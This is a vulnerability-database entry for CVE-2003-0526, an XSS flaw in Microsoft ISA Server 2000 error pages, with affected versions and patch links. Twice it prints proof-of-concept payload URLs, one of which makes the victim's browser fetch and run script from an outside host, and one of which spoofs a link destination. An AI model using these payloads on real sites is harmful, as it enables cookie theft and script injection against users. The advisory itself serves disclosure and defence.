CVE-2003-0526
CVSS 6.8
Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:35:00

[Original] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found."


[CNNVD] Microsoft ISA Server HTTP Error Handling Cross-Site Scripting Vulnerability (MS03-028) (CNNVD-200308-071)

        Microsoft ISA Server integrates an extensible, multi-layer enterprise-class firewall with an extensible, high-performance web caching service.
        Microsoft ISA Server's error pages do not adequately filter client-supplied data. A remote attacker can exploit this vulnerability to carry out cross-site scripting attacks and may steal sensitive information such as the cookies a user relies on for authentication.
        When ISA Server encounters an HTTP error code such as "404 Not Found" or "500 Internal Server Error", it returns the error-handling information as an HTML page; these HTML files use script to output a link containing the SERVER.TLD portion of the requested URL. By constructing a specially crafted URL it is possible to include arbitrary script commands in the HTTP error-handling page; when a user visits such a link containing malicious script, sensitive information such as the user's authentication cookie may be disclosed.

- CVSS (base score)

CVSS score: 6.8 [Medium (MEDIUM)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:isa_server:2000:fp1  Microsoft isa_server 2000 fp1
cpe:/a:microsoft:isa_server:2000:sp1  Microsoft isa_server 2000 sp1
cpe:/a:microsoft:isa_server:2000  Microsoft isa server 2000

- OVAL (technical details for detection)

oval:org.mitre.oval:def:117  Microsoft ISA Server Cross-Site Scripting
*OVAL describes in detail the method for detecting this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0526
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0526
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-071
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0029.html
(VENDOR_ADVISORY)  VULNWATCH  20030716 ISA Server - Error Page Cross Site Scripting
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0031.html
(UNKNOWN)  VULNWATCH  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://marc.info/?l=bugtraq&m=105838519729525&w=2
(UNKNOWN)  BUGTRAQ  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://marc.info/?l=bugtraq&m=105838862201266&w=2
(UNKNOWN)  BUGTRAQ  20030716 ISA Server - Error Page Cross Site Scripting
http://marc.info/?l=ntbugtraq&m=105838590030409&w=2
(UNKNOWN)  NTBUGTRAQ  20030716 Microsoft ISA Server HTTP error handler XSS (TL#007)
http://pivx.com/larholm/adv/TL006
(UNKNOWN)  MISC  http://pivx.com/larholm/adv/TL006
http://www.microsoft.com/technet/security/bulletin/ms03-028.asp
(UNKNOWN)  MS  MS03-028

- Vulnerability information

Microsoft ISA Server HTTP Error Handling Cross-Site Scripting Vulnerability (MS03-028)
Medium  Input validation
2003-08-18 00:00:00  2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-028) and a corresponding patch for this issue:
        MS03-028: Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (Q816456)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-028.asp

        Patch download:
        Microsoft ISA Server English:
        
        http://download.microsoft.com/download/4/6/4/464c95cd-8488-410d-bacb-69b25eaa7822/ISA2000-KB816456-x86.exe

        Microsoft ISA Server French:
        
        http://download.microsoft.com/download/a/d/6/ad64a2af-d359-44e5-88d9-321269f1afde/ISA2000-KB816456-x86.exe

        Microsoft ISA Server German:
        
        http://download.microsoft.com/download/9/f/3/9f39d8a7-4897-43e5-bd90-70cc468139ae/ISA2000-KB816456-x86.exe

        Microsoft ISA Server Spanish:
        
        http://download.microsoft.com/download/5/a/a/5aabcffe-e89c-4275-b2ba-64c47e42f078/ISA2000-KB816456-x86.exe

        Microsoft ISA Server Japanese:
        
        http://download.microsoft.com/download/1/5/b/15b400a5-5b40-4721-92b0-caef3f190146/ISA2000-KB816456-x86.exe

- Vulnerability information (22919)

Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities (EDBID:22919)
windows remote
2003-07-16 Verified
0 Brett Moore
N/A
source: http://www.securityfocus.com/bid/8207/info

ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains.

The following proof-of-concept was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation.

*http://<iframe>:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination:
<A href="http://www.example.com%09%09%09@%09%09%09%09%09%09
09www.malware.com">http://www.example.com</A>

- Vulnerability information

2298
Microsoft ISA Server Error Page XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

ISA Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the returned URI upon submission to the error page script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2003-07-16 2003-05-21
2003-07-16 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

Microsoft ISA Server Cross-Site Scripting Vulnerabilities
Input Validation Error 8207
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
Discovery credited to Brett Moore of Security-Assessment.com.

- Affected program versions

Microsoft ISA Server 2000 SP1
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft ISA Server 2000 FP1
Microsoft ISA Server 2000
+ Microsoft Small Business Server 2000 0
+ Microsoft Small Business Server 2003 Premium Edition
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server

- Vulnerability discussion


This vulnerability is reportedly similar to the one described in BID 4486.

- Exploit

The following proof-of-concept was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation.

*http://<iframe>:test@[site]/test

The exploit provided for BID 4486 will also reportedly work for this vulnerability.

An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination:
<A href="http://www.example.com%09%09%09@%09%09%09%09%09%09
09www.malware.com">http://www.example.com</A>

- Solution

Microsoft has released a patch:


Microsoft ISA Server 2000 FP1

Microsoft ISA Server 2000 SP1

- Related references

 

 
